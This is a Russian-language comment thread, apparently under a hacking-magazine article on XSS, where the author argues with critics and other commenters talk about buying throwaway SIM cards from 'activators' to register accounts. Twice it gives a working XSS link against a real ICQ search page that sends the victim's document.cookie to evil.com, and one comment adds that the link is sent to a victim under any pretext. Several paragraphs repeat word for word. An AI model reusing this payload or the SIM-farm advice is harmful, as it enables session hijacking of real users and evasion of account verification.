У активаторов очень много клиентов с подобными просьбами, им просто ненужно это. И портить себе репутацию — себе дороже ) Но, конечно, я скорее смотрю на это со своей точки зрения, так как не использую контакт так, как положено, для меня это скорее какая-то полуделовая переписка / музыка / видео. То есть, конечно, если бы я хотел там постить свои фотки, признаваться кому-то в любви или что-то в этом роде, то я, безусловно, не доверил бы кому то номер телефона. Я бы просто купил у барыг пару десятков левых симок и регнул сам на левые номера.
Все находится у активатора. И симка, и телефон. Я ему пишу по аське, например — «прими смс». Он вставляет симку в телефон, ждет, посылает мне текст смски по той же аське.
Поэтому я никогда ничего не регаю на свой мобильник. Спасают левые симки: http://forum.antichat.ru/forum150.html. Можно даже сказать человеку (активатору), чтобы оставил симку и не выбрасывал. Это конечно деньги, но активировать аккаунт это 10руб… Лучше чем принимать тонны спама или быть «под колпаком».
Но я думаю, что XSS все-таки является одним из самых распространенных и хорошо известных способов взлома, тем самым можно предположить, что если уж я написал об этом статью в журнал, где большинство редакторов (если не все) имеют представление о том, что это такое, и они это издали, то, скорее всего, я прав в нашем небольшом спорчике со semaster'ом.
Хех, действительно мое ) Данная статья скорее концепт, мне действительно пришлось нечто такое сооружать, но это небыл брут мд5, кое-что другое. Просто читателям нужно донести суть, а не рассказывать ненужные людям моменты.
Насчет врезок, которые вам «доставили», ну что ж, могу сказать только то, что разделов в журнале много, и какая-то информация, которая является очевидной и простой для сисадмина, не всегда очевидна для программера (программер это не сисадмин). Понимаете, журнал и другая литература это не показывание «насколько я крут» и как много умных слов я знаю. Это наоборот диалог с читателем и старание донести ему полезные приемы, информацию и прочее.
Извините, не читал, и особого желания в 0:55 читать нет. Комментировать не буду, про «мурзилку» это вы конечно зря, просто формат издания не позволяет фильтровать какие-то не точности иногда — не все из редакторов разбираются в той или иной теме так, как авторы статей. Иначе бы эти авторы и не нужны были, редакторы бы сами все писали и все. В любом случае, я не редактор, а автор, и если вы найдете оплошности в моих статьях — велкам, обсудим. За других отвечать я не буду. А если вы к тому, что «васька плохо написал, значит там все такие» — ну незнаю, почитайте Степа, Мага, Касперского (не Евгения) и других мастеров своего дела.
Семастер, ну берегите же вы свои нервные клетки, если с вашей точки зрения мы пишем бред, ну просто забейте и скажите про себя «вот идиоты» и перестаньте нам доказывать свои истины. Разве мы стоим вашего времени?
Позвольте спросить, зачем тут.конкат? Даже не +конкат, а именно.конкат ). Может все-таки + escape(document.cookie). Или вообще + encodeURIComponent(document.cookie)? Или даже вот так: http://search.icq.com/search/selected_img.php?site_url=javascript:var x=new Image(); x.src='http://evil.com/s.php?c='+encodeURIComponent(document.cookie);
Это вы верно заметили, и от xss действительно спасает привязка кукисов к ip например и прочие техники. Но мы вроде бы говорим вообще (в большинстве случаев никто ничего не привязывает), а не в частности.
Но я думаю, что XSS все-таки является одним из самых распространенных и хорошо известных способов взлома, тем самым можно предположить, что если уж я написал об этом статью в журнал, где большинство редакторов (если не все) имеют представление о том, что это такое, и они это издали, то, скорее всего, я прав в нашем небольшом спорчике со semaster'ом.
С наступающим!
Насчет врезок, которые вам «доставили», ну что ж, могу сказать только то, что разделов в журнале много, и какая-то информация, которая является очевидной и простой для сисадмина, не всегда очевидна для программера (программер это не сисадмин). Понимаете, журнал и другая литература это не показывание «насколько я крут» и как много умных слов я знаю. Это наоборот диалог с читателем и старание донести ему полезные приемы, информацию и прочее.
http://search.icq.com/search/selected_img.php?site_url=javascript:var x=new Image(); x.src='http://evil.com/s.php?c='+encodeURIComponent(document.cookie);Знаете, я многим обьяснял все тонкости хсс, и никто не впадал в ступор. Даже странно слышать.
Жертве кидается этот линк под любым предлогом.